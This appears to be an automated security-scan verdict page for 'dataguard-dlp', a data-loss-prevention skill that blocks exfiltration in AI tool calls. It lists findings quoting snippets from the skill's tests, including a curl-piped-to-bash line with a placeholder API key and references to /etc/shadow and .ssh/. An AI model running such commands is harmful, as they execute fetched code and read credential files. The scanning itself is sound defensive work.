Caveat verdict
Dataguard DLP
dataguard-dlp
A DLP enforcement skill that intercepts outbound tool calls to block data exfiltration; it hooks pre-execution of web_fetch/sessions_send/exec to scan for credential patterns and block unauthorized transfers, which is precisely its stated protective purpose.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Findings (6)
Pipe to bash — executes piped content as shell commands
SKILL.md · code · | bash
Accesses sensitive system files
tests/test-all.sh · prose · downgraded · /etc/shadow
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
tests/test-integration.sh · prose · downgraded · curl 'https://api.example.com?key=sk-ant-api03-xxxxxxxxxxxxxxxx'" | bash
Accesses .ssh directory
SKILL.md · prose · downgraded · .ssh/
Sets world-executable permissions
scripts/install.sh · prose · downgraded · chmod 700
Popular HTTP library — network access
tests/test-all.sh · prose · downgraded · got
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B/F). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
Requires 1 system binary.
Is this flag fair?
Thanks — recorded.